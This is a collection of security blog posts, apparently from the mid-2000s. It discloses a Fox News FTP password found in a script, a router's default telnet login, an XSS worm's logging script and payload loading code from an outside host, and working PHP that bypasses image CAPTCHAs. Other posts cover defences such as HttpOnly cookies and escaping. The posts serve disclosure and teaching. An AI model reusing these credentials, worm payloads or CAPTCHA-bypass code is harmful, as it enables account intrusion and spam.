Foxnews to become wikinews?

Foxnews.com has taken an unexpected turn and become an open wiki site. For more info see http://linuxinit.net/site/?id=664. Summary:

While browsing around the Fox News website, I found that directory indexes are turned on. So, I started following the tree up until I got to /admin. Eventually, I found my way into /admin/xml_parser/zdnet/, in which there is a shell script. Seeing as it's a shell script, and I use Linux, I took a peek. Inside is a username and password for an FTP server. So, of course, I tried to log in. The result? Epic fail on Fox's part. And seriously, what kind of password is T1me Out? This is just pathetic.

http://www.foxnews.com/admin/xml_parser/zdnet/grab_zd_files.sh

And here’s something just too funny, something I hope will turn up on xkcd.com

Raptor porn

(originally located at http://www.foxnews.com/images/root_images/071907_velociraptor1.jpg, this is a mirrored copy)


Happy birthday SecuriTeam Blogs

As other recent posts have mentioned, these blogs have just turned 2 years old. To celebrate the event I wanted to look back through the archives and find a post that stood out. This is hard when you're talking about a blog of this calibre. I started reading various popular posts; they were all very well written, technically and linguistically, so I had a hard time choosing. I decided to take an alternate route: I read the posts made around the time I joined the site, the ones that convinced me of the greatness of this blog.

I went back to January 2006 and one post in particular jumped right out at me: Interview: Ilfak Guilfanov. This was a great post addressing what was, at the time, a major issue, and it made me realise just what type of people make up this blog. I suggest you have a read of that post and other similarly great posts; they make great reading for a Monday morning or early afternoon.
Happy birthday blogs, may your next 2 years be even greater.


Phishing just got a little less tedious

I know I shouldn't be merely referencing others' blog posts, but this is just too good. Kuza55 has written up how a phisher can very easily get around the phishing filters implemented in IE7, Firefox and Opera.


Burp Proxy open for orders

I'm writing this purely to pass on a message. If you've ever used Burp Suite and have a comment about the software, now is the time to let the developers know. If you haven't tried it yet, give it a go; you won't regret it.

This is just to let you know that work is underway on the next release of Burp Suite, which should be available later this year. This will be a major upgrade with lots of new features in all of the tools.

At this point, it would be good to hear any other feature requests that you may have, however large or small. Please reply to me directly or join the discussion here:

http://blog.portswigger.net/

and I’ll address as many as I can.

I’d be grateful if you would pass this email on to anyone else in your team who uses Burp Suite.


Follow-up to my post about my ex-ISP's backdoor

It's been roughly two months since my post Accidental backdoor by ISP. Dan Goodin has now written the whole thing up nicely for everyone to read:
ISP ejects whistle-blowing student
Don’t forget to digg it :p


Firefox 3 to support HttpOnly cookies

HttpOnly cookies are a mechanism Microsoft developed for IE6 SP1 to add some security to cookies. The web developer sets a cookie (for instance the session cookie) to be HttpOnly (both ASP and PHP support setting HttpOnly cookies) and the browser will only ever use that cookie when sending HTTP requests, never when client-side script asks to read it. This means that if there is a cross-site scripting flaw on the website, the injected JS can't read the cookies. The solution isn't perfect, but it does what it's meant to do and doesn't harm anyone.
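
For the PHP folk, here's a minimal sketch, assuming PHP 5.2+ (where setcookie() gained a seventh parameter for exactly this):

<?php
// The final 'true' is the httponly flag (PHP 5.2+): client-side script can
// no longer read this cookie via document.cookie.
setcookie('session_id', session_id(), 0, '/', '', false, true);

// PHP's own session cookie can be marked the same way:
ini_set('session.cookie_httponly', '1');
?>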

Support for this is already in the Firefox 3 alphas, if you are inclined to use them; otherwise you'll have to wait until November or so for the first official Firefox 3 release.

If you are a web developer I suggest you start updating your code to use HttpOnly where applicable.


Accidental backdoor by ISP [updated x2]

I've been a happy customer of my ISP BeThere for a few months now. Overall they're great: they are quick to sort you out with your connection, and their emails and other communications are very humorous and actually make good reading (I remember the router's documentation CD has a warning label reading something like "warning: geeky content inside"). When I signed up I managed to get the username root, which pleased me no end, and I thought I'd finally found an ISP I want to stay with forever.

Finding the hole
Recently though, a friend of mine was extremely bored and decided to nmap my IP address. He found, and told me, that I seemed to be listening on port 23, telnet. I was extremely puzzled by this: I hadn't forwarded port 23, and I would never use a telnet daemon for anything. It occurred to me that it must be the router itself running the daemon. I telnetted to 192.168.1.254 and, lo and behold, it asked me to log in. I logged in with the default credentials (yes, I had never gotten around to changing those), which are Administrator:null
(more…)


XSS Worm strikes GaiaOnline

GaiaOnline is a highly popular web-based game, making it a perfect target for an XSS worm, and that is exactly what Kyran set out to hit, with a little help from Kuza55. I'll be writing about his worm, why it's so special, the results he collected and the response from GaiaOnline.

Normally when you consider an XSS worm, such as the infamous Samy worm or the lesser-known IPB ones, the one thing they have in common is how they spread: they abuse a filter flaw to store themselves in some permanent storage, such as the user's profile or signature. This worm differs in that it uses only reflective XSS holes.

A reflective XSS hole is one where the input you provide is not stored permanently but is only printed onto the page because it was one of your input variables, usually sent via GET or POST; in this case, POST.
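
As a quick, hypothetical PHP illustration (not GaiaOnline's actual code), a reflective hole can be as simple as:

<?php
// Vulnerable: the "q" parameter is echoed straight back into the page, so a
// crafted link or auto-submitting form makes the victim's browser run
// attacker-supplied script. Nothing is stored server-side, which is what
// makes the hole "reflective".
echo "You searched for: " . $_GET['q'];

// The fix is to escape on output:
echo "You searched for: " . htmlentities($_GET['q'], ENT_QUOTES);
?>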

Back to the worm. Kyran was not interested in causing havoc; the worm is merely an experiment to see how far a non-permanent worm can spread on a site with a reach of 40% (source). First I'll give you the logging script used.

log.php:

<head>
<title>Error!</title>
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
</head>
<?php
// Declares the file to log to.
$myFile = "log.txt";
// Get a file handle, or end execution if the file can't be opened.
$fh = fopen($myFile, 'a') or die("can't open file");
// Take the data sent via POST from start.js and put it in $stringData.
$stringData = $_POST["username"];
// Write the string to the file.
fwrite($fh, $stringData);
// Add a tilde followed by a newline to divide each entry.
$stringData = "~\n";
fwrite($fh, $stringData);
fclose($fh);

?>

As you can see he only logged the username, as he was not interested in actually taking control of any accounts. Sadly no timestamp was recorded with each entry, but I'm hedging my bets that next time there will be :p.

Now, onto the juicier bits: the worm. The code isn't long (you won't have to wade through something Samy-like again). In short it does this:

  1. Create the content to replace the page with
  2. Set up an AJAX object
  3. Create the variables used to send a PM (addressing the PM to everyone in the victim's friends list)
  4. Send the PM.

Gaia has a feature whereby a PM sent to friends@gaia actually goes to everyone in your friends list. This allowed for an obvious shortcut in the code, but the worm would be perfectly possible without it; it would just require one extra AJAX request and some parsing. The payload of the PM is as follows:

"><script defer xsrc=//gaiaonli.site.com/start.js></script><style> (url changed)

As you can see, it just pulls the script in again, which again sends the PM to everyone in the friends list. I've got a copy of the script here; I have changed the URLs of log.php and start.js in the code, but otherwise this is what start.js would have looked like.

That's the worm. It can be argued that it is a persistent attack as it is stored in a PM, but as Kyran said: "the XSS is reflective, just the propagation method is persistent. But, that's just semantics".

What was logged through this worm? Kyran ran it for 3-4 hours (with a central .js file it's easy to stop the worm) and logged 1500 unique usernames, but not much more can be deduced in terms of growth over time due to the lack of timestamps. Since passwords weren't logged we can't check statistics on those, but I would hazard a guess that they'd be similar to those of sites like MySpace. In any case, the point of this exercise was to see how well a reflective XSS worm can spread on a large site.

Kyran did post the worm (code included) on their forum, but that was quickly taken down by one of their mods. He created a new thread without the code in it, which has stayed up. Here's Kyran's summary of the second thread: "the staff haven't posted anything. It's mostly people calling me a terrorist". As of yet they haven't contacted him for any details (it is possible the mod who took down the first thread kept a copy of the code, in which case there is no need to contact Kyran if all they want to do is patch the hole).

What can be understood from this whole incident? Reflective XSS can viably be used to spread an effective worm, and sending variables via POST does not make people any safer. Considering how very common reflective XSS is (34 pages of reflective XSS flaws), this is something webmasters really need to start getting to grips with. Furthermore it's clear that GaiaOnline aren't ready for users reporting flaws: they don't know what to do when a flaw is reported and they aren't too quick at fixing them (at the time of writing the flaw is still up).

Now… what site is next?


PDF = Potential Death File?

I suggest you tell your browser to change how it handles .pdf files so that instead of displaying them in the browser it downloads them. Sven Vetsch has written about a flaw found by Stefano Di Paola and Giorgio Fedon (who presented it at CCC, link) in which a .pdf file can run arbitrary JavaScript on the site hosting the file. It seems that just by hosting PDFs you are putting your site's users at risk of all the evil doings JavaScript can perform. If you want to find out more about the flaw I suggest you read the afore-linked blog post, or GNUCitizen's take on it (which has a PoC). What I am more interested in right now is fixing the issue.

Obviously a plugin upgrade would be nice, but what about between then and now? I'd be happy if we could get a fix out quickly for webmasters to apply to their sites, but since the part of the URL after the hash (which in this case is what holds the malicious code) is never sent to the server, any server-side solution is pretty much impossible.
Oh what a fun start to the new year, eh? On a more light-hearted note, the first person to see a spam email using this technique wins a virtual cookie from me.


Acunetix denying web site flaws

Today's story of "You're lying, we weren't vulnerable" comes from Acunetix. Copy-pasted from their "about us" page, this is how they describe themselves:

Acunetix was founded with [web application threats] in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released – a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.

I suppose I should give some background info before laying into Acunetix too much.
(more…)


XSSing with the Expect header

I know that XSS is looked down upon by a lot of people in the security sphere, but I feel it has been severely underestimated. Using it to steal cookies is really only the very start of it.

That's beside the point, though; I will post links to rarely used (or maybe just up-and-coming) uses for XSS later in this post.

Here's the HTTP Expect header as defined in the RFC:

The Expect request-header field is used to indicate that particular server behaviors are required by the client. (more…)


Should we kill IE?

Earlier today I stumbled across a link to explorerdestroyer.com, a site trying to convince web developers to urge their IE users to switch to Firefox. They ask web developers to employ one of a range of solutions, from showing IE users an advert for Firefox to not letting IE users near their pages at all.

To me their approach seems silly. The problem (as they see it) is that IE doesn't support various standards and encourages proprietary features. But if everyone used Firefox, what's to stop it from becoming the next "IE"? Won't it get proprietary features which will then get used? As an example, (last I read) Firefox allows transparency via CSS, but the W3C has no official support for transparency (IE and Opera also support it, but each in their own way).

I think there should be an even spread of browser usage. This would encourage sites being developed to the standards and more importantly would speed up browser improvements as all the various companies would have to constantly improve their browsers to maintain their user base.

I am reminded of a South Park episode where the people rebel against Walmart, burning it down, then all shop at a local shop until it becomes the next Walmart, and the whole process repeats over again.

I'm all for people saying how bad one thing is and promoting another, but to me this goes too far. They go as far as saying that Firefox has to quickly gain users so that IE6 users don't switch to IE7 and stay with it. IE7 is a good browser; it fixes a lot of the issues people hate about IE6. I think IE6 users should switch to IE7 (when it's released) and then be left to do whatever they want, but deliberately forcing people away from a good browser is simply not a clever idea. I'm glad that Mozilla aren't affiliated with this site, as I dislike the aggressive mannerisms, though I would enjoy reading Mozilla's comment on it.

Oddly enough, the site I’ve linked to works perfectly fine with IE and they have no nag screens asking me to change over.


…and one giant step for PHP security

While hosts are still undecided on whether to upgrade to PHP5 or not, the people pushing the limits of possibility are busy planning PHP6. PHP6 is mainly a cleanup of the code and the addition of some object-oriented features (and some other little bits which probably mean more to others than to me). Nevertheless, in terms of security it's something I'm already drooling over.

Every week several exploits are found in various applications written in PHP. Even given the vast number of applications (and therefore flaws), some problems can't be blamed solely on the coder. For me at least, there have always been functions I'm extremely careful with whenever I pass any parameter into them. Now all this is going to be made simpler, safer, better.

Register globals are gone! No more detecting it and coding around it, or worse, not detecting it and getting your ass pwned. To be honest, hardly anyone has it turned on anymore, but I've still found it a major hassle, especially when I'm helping out people who are used to having it on and suddenly have lost it.

Magic quotes are gone! Again, no hassle of detection. Instead we'll have the input filter extension, which is so very much better.
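
As a rough sketch of the sort of thing the filter extension gives you (this is the API as it shipped in later PHP 5 releases):

<?php
// Validate input at the point of entry instead of undoing magic quotes:
// filter_input() returns the value as an integer, false if "id" is present
// but isn't a valid integer, or null if it wasn't sent at all.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null)
    die('Invalid id');
?>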

Easier detection of MIME types, which should improve checking whether uploaded files are valid.

header() will only accept one header, hopefully virtually killing off HTTP response splitting attacks.
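
For anyone unfamiliar with response splitting, here's a sketch of the vulnerable pattern this change guards against (hypothetical code, not from any real application):

<?php
// If $_GET['page'] contains CRLF sequences, e.g.
//   home%0d%0aSet-Cookie:%20evil=1
// the attacker can smuggle extra headers (or even a whole second response)
// into the output. Restricting header() to one header kills this off.
header("Location: http://example.com/" . $_GET['page']);
?>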

For full details about the April PHP6 meeting read the minutes.


Stupid people

All my life I've come across stupid people; I've come to expect people to be stupid, and I'm usually not let down by that assumption. When I find intelligent people I treasure them like Eskimos would treasure electric blankets covered in whale fat and powered by a bucket-sized cold fusion reactor. Of course, I use the web more than is healthy, which is one reason I'm always speaking to stupid people, and this is all fine and something I take in my stride. It's when you come across people that aren't meant to be stupid, yet are, that you lose that little faith you had left in humanity. It's when the admin of a site which has thousands of members and has been running for 3 years doesn't realise how bad it is that people can run HTML from PMs, signatures, usernames, forum posts or article comments.

You inform the admin about these flaws, explaining the dangers of XSS using the example of an attacker running JavaScript, and you let them know they should run htmlentities() on all user input before displaying it. What do they do? They either totally ignore you or they add some code to replace all instances of <script> with script. Idiots.
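
For clarity, the fix really is this simple (a minimal sketch; the field name is made up):

<?php
// Escape user input on output so the browser treats it as text, not markup.
// This covers <script> and every other tag, unlike the naive replace trick.
$signature = isset($_POST['signature']) ? $_POST['signature'] : '';
echo htmlentities($signature, ENT_QUOTES);
?>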

Here's my theory: people who had Geocities accounts when they were 10 branched into 3 paths. They either 1) got bored of the whole developer thing and started collecting Pokemon cards, 2) got good and now make efficient, secure web applications, or 3) stayed at the Geocities level but got money and can afford their own domain. It is this 3rd category that now pollutes the web with its binary waste. When you don't realise that a permission check is needed to prevent just anyone from deleting a PM, you need to find a cliff to jump off. When told so, and your counter-argument is that no one can be bothered to manually browse to /remove_pm.php?message_id=1, …id=2, …id=3, then a cliff simply won't do the job, you'll need to find something simpler. I suggest jumping in front of a car… yes, a moving one.
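
Here's what that missing check looks like, sketched against a hypothetical table and session layout:

<?php
// Delete the PM only if it belongs to the logged-in user, so that walking
// through message_id=1, 2, 3... does nothing to other people's messages.
$messageId = (int) $_GET['message_id'];
mysql_query(sprintf(
    "DELETE FROM private_messages WHERE id = %d AND owner_id = %d",
    $messageId,
    (int) $_SESSION['user_id']
));
?>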

The lesson: I understand that people have to start at the basics of anything before they can get any better, but for the love of all that's holy (Eskimos in their bucket-sized-cold-fusion-reactor-powered, whale-fat-covered electric blankets), read articles on the web, ask people, learn from the mistakes others made, experiment on your own computer or borrow books from a library before you go spending money to run a web site. Everyone makes mistakes, but learn from them and learn to accept help from people who offer it.


Saying NO to messy user agents

I'll ask you what should be a simple question and let's see if you know the answer: what is the user agent of the browser you're currently using? Well… granted, it's not something people try to remember, but the fact that almost all user agents start with "Mozilla/x.0 (…" doesn't help.

Here are my current user agents:
Firefox: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
IE: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Sure, you can tell them apart, but what's with all the junk? Why do they both start with Mozilla, what's the junk at the end of IE's UA, and why does Firefox have Windows in the string twice? In case you're interested, the reason "Mozilla" exists in just about every UA string around is mentioned here.

Why not start afresh and do it properly this time around? What works well? What kind of system should the new UA follow? Well… think about it for a minute: the UA string usually holds information such as browser name, version, OS name and OS version. In essence it's attribute, value, attribute, value. Why not make it like an XML tag? You could immediately scrap the < and > as they'd be pointless, but otherwise this approach should work.

Unlike XML, the attributes should be fixed. Not fixing them means we'll end up with the same mess we have at the moment; on the other hand it means we have to put great thought into what the attributes are. The most important one would be UAtype, which could equal browser, spider, download manager or other. The last option would include such things as PHP, applets loading a page, and people's own programs which download a file (unless they are download managers, of course). It could also be used to inform the server that the agent is a braille browser or a screen reader, though maybe those should come under another optional attribute.

The other attributes could be Organisation (the organisation which made the agent), UAname (the name of the software), UAversion (which would be 1.5 in the case of Firefox and 6.0 in the case of IE), OSname and OSversion. This would make my Firefox UA string:
UAtype="browser" Organisation="Mozilla" UAname="Firefox" UAversion="1.5" OSname="Windows" OSversion="XP Pro SP2"
This is much easier to read and understand. Obviously each attribute should be optional, but you shouldn't be able to add your own. Well… you could add your own, but don't expect it to make a difference.

Why do I want all this done? Imagine the difficulties that developers face in writing the software that logs who visits your sites; with this it would suddenly be so very easy (see the sketch below). If nothing else this would promote competition in that area, which is always a good thing. It would also help the web developers who write browser-dependent JavaScript and have to parse the UA string for various bits and bobs.
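
To show just how easy, here's how the proposed (entirely hypothetical) XMLUA header could be parsed in PHP, assuming space-separated attribute="value" pairs as described above:

<?php
// Turn the proposed XMLUA header into an array of attribute => value pairs.
function parse_xmlua($header)
{
    preg_match_all('/(\w+)="([^"]*)"/', $header, $matches, PREG_SET_ORDER);
    $attributes = array();
    foreach ($matches as $match)
        $attributes[$match[1]] = $match[2];
    return $attributes;
}

$ua = parse_xmlua('UAtype="browser" Organisation="Mozilla" UAname="Firefox" UAversion="1.5"');
echo $ua['UAname']; // Firefox
?>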

The change would not have to happen overnight; it could be a gradual process of acceptance (or rejection, depending on how you look at it). New browsers could send their regular user agent plus a second header called XMLUA which follows the pattern described here. Obviously there would be no way for PHP or JavaScript to read this new XMLUA header until the functions/variables are built into the languages. One possibility is to wait for the functions to be created; alternatively, web servers could check whether an XMLUA header exists and, if so, replace the regular user agent with the new one. This would in fact break the existing browser detection functions in every language, so waiting for the languages to upgrade would be the ideal solution.

Eventually the regular UA string could be dropped.

Maybe you feel I missed out a crucial attribute, maybe you feel the current system works fine (why fix what ain’t broke?). Let me know.


Bypassing the random image anti-spam feature

A friend of mine has been playing a game through the browser; some tasks can be automated, which allows the player to earn money or increase stats quickly, or while not at the computer (this particular action does not interact with other players). My friend created a bookmarklet which would automate one such task. All was hunky-dory until the game asked the user to read an image and copy the text down. This is done precisely to prevent these automated bots. Still… it provides an interesting problem: how could you read the image and continue the game automatically?

I couldn't sleep the first night I was presented with this problem; I went down more dead ends than I thought existed in this kind of problem. Eventually I decided to take a break and start again. Logically, how could JavaScript read an image? It can't. It would need some other technology, which would have to reside either on a remote domain (if web based) or on the local machine. JavaScript cannot call either of these, so it seemed I had come to a dead end, again. In fact, it would be impossible to solve this using JS at all; you would need a separate program precisely because you need to call either a remote web site or a local program. Realising this decreased my enthusiasm, as now it was merely an experiment to see if it could be done.

I remembered a certain web service that I'd used a while back, namely WhatTheFont (WTF). This service reads an image and tries to deduce the font used from the characters it can find. I figured I could use it to read the characters in an image.
I found a random image such as Tokyo, which is the kind of image the user has to copy. I tried uploading the image to the WTF site, but it failed to read it. I noticed the sample images they provide are much larger, so I scaled my image up and submitted it again; this time WTF could read the image perfectly.

Now… if only I could get some PHP code to read an image file, scale it up, submit it to WTF and read the response.

I should say that the code I provide is very untidy; this is because it's the result of sleepless nights, and at points I hacked certain bits together, then edited them again later. I explain the code just below the code itself.


function doIt()
{
    // Pick a random name so concurrent runs don't clobber each other's files.
    $r = rand(100000, 999999);
    // Only GIF and PNG are supported; anything that isn't a GIF is assumed to be PNG.
    if (@imagecreatefromgif($_GET['img']))
        $ext = 'gif';
    else
        $ext = 'png';
    $file = $r . '.' . $ext;
    // Copy the remote image into this script's folder, or quit on failure.
    if (!@copy($_GET['img'], $file))
        die("Error");
    chmod($file, 0777);
    // Scale the image up so WTF can read it.
    up_size($file, 5, $ext);
    // Ask WTF to analyse the rescaled image and fetch its response.
    $lines = file("http://www.myfonts.com/WhatTheFont/Upload?url=http://www.whiteacid.org/img_reader/" . $file);
    parseInput($lines);
    // Remove the temporary image.
    unlink($file);
}

The code first determines the image type. The script only allows PNG and GIF: BMP wouldn't be used as no one really uses it any more, and JPG wouldn't be used as it would blur the lines, making it difficult for humans to read the letters. It then saves the image to the folder the script resides in under a random name (or quits if there's a problem). I did this because, for some reason, the script seemed to work better when the image was in the same folder, or at least on the same domain. I then scale the image up (that function is below), perform the request and run parseInput (again, code coming below). Finally I remove the temporary image file.
The up_size function’s code is here:

function up_size($imageUrl, $ratio, $extension)
{
    // Load the source image with the appropriate decoder.
    if ($extension == 'gif')
    {
        $src_img = @imagecreatefromgif($imageUrl);
    }
    else
    {
        $src_img = @imagecreatefrompng($imageUrl);
    }
    $origw = imagesx($src_img);
    $origh = imagesy($src_img);

    // Create a larger canvas and stretch the original image onto it.
    $dst_img = imagecreatetruecolor($origw * $ratio, $origh * $ratio);
    imagecopyresampled($dst_img, $src_img, 0, 0, 0, 0, $origw * $ratio, $origh * $ratio, $origw, $origh);

    // Save the scaled image back over the original file.
    imagepng($dst_img, $imageUrl);

    return $dst_img;
}

It reads the file and creates an image object, reads its width and height, makes a new image with a larger canvas and copies the old, smaller image onto that canvas, stretching it to fit. That's how it scales up images. Finally it saves the result back to the file.

Now that the image had been scaled up, it was sent off to WTF and the response was stored in a variable, ready to be parsed. Before I give the code for the parsing section you should know what the output HTML looks like. Very simply, WTF prints out:

<input type='text' name='ch[0]' id='wtfchar0' value='T' size='2' maxlength='1' style='font-size:20; font-family:verdana; text-align:center;'>
<input type='text' name='ch[1]' id='wtfchar1' value='o' size='2' maxlength='1' style='font-size:20; font-family:verdana; text-align:center;'>
<input type='text' name='ch[2]' id='wtfchar2' value='k' size='2' maxlength='1' style='font-size:20; font-family:verdana; text-align:center;'>
<input type='text' name='ch[3]' id='wtfchar3' value='y' size='2' maxlength='1' style='font-size:20; font-family:verdana; text-align:center;'>
<input type='text' name='ch[4]' id='wtfchar4' value='o' size='2' maxlength='1' style='font-size:20; font-family:verdana; text-align:center;'>

There is more markup in between those segments, but that's what we're after. The easiest thing to search for is id='wtfchar$n', then parse the value attribute after it. Note that if a character could not be identified, the value attribute will be blank, in which case we return a question mark instead, to let the user know that one character remained unknown. OK, the code:

function parseInput($lines)
{
    $c = 0;
    foreach ($lines as $line_num => $line)
    {
        // Note the !== check: strpos() returns 0 when the match is at the very
        // start of the line, which a loose != would wrongly treat as "not found".
        if (strpos($line, "id='wtfchar$c'") !== false)
        {
            // Grab the two characters following value=' on this line.
            $char = substr($line, strpos($line, "id='wtfchar$c' value='") + strlen("id='wtfchar$c' value='"), 2);
            if ($char == "' ")
                $char = '?'; // blank value: character not identified
            else
                $char = substr($char, 0, 1);
            echo $char;
            $c++;
        }
    }
}

For each line of output we search for "id='wtfchar$c'", where $c is an incrementing integer starting at 0. If it's found (meaning we're on the right line of output), we parse out the value, or echo a question mark if the value is blank.

One more line of code is required: you need to call doIt(), and then you're done.

That's about it: using that code you can parse text from an image, which allows you to complete some forms automatically. This could obviously be used for spamming, which is why, instead of using images like the ones I've used here, people should use ones like Hotmail's and Gmail's:

Hotmail random image

To see the script in action I made one script which allows you to create images of text, and another as described here. I used to host examples of this code in action, but my new host doesn't allow file access from a URL.
